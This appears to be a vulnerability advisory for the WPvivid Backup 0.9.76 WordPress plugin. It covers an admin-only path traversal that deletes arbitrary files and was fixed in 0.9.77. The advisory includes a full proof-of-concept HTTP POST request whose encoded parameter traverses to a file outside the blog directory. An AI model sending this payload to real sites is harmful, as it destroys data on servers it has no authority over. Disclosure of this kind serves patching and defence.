WPvivid Backup 0.9.76 – Admin+ Arbitrary File Deletion | Plugin Vulnerabilities

Description

The plugin introduced an issue in its delete_upload_incomplete_backup AJAX action, which could allow high privilege users to delete arbitrary file on the server via a path traversal attack

Proof of Concept

This will delete the file delete-me.txt in the directory above the blog one

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 137
Connection: close
Cookie: [admin+]

action=wpvivid_delete_upload_incomplete_backup_free&nonce=ccda0e5b66&incomplete_backup=%7b%221%22%3a%22..%2f..%2f..%2fdelete-me.txt%22%7d

Affects Plugins

wpvivid-backuprestore

Fixed in 0.9.77

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

605bc4bf-0a26-4d77-8e0c-cdc5fb58b817

Timeline

Publicly Published

2022-08-29 (about 3 years ago)

Added

2022-08-29 (about 3 years ago)

Last Updated

2022-08-29 (about 3 years ago)

Other

Published

Title

Published

2023-11-21

Title

Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal

Published

2022-08-22

Title

WPvivid Backup < 0.9.76 - Admin+ Arbitrary File Read

Published

2014-08-01

Title

Advanced Dewplayer <= 1.2 - download-file.php dew_file Parameter Traversal Arbitrary File Access

Published

2025-10-15

Title

Download Counter Button <= 1.8.6.7 - Unauthenticated Arbitrary File Download

Published

2023-12-01

Title

Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion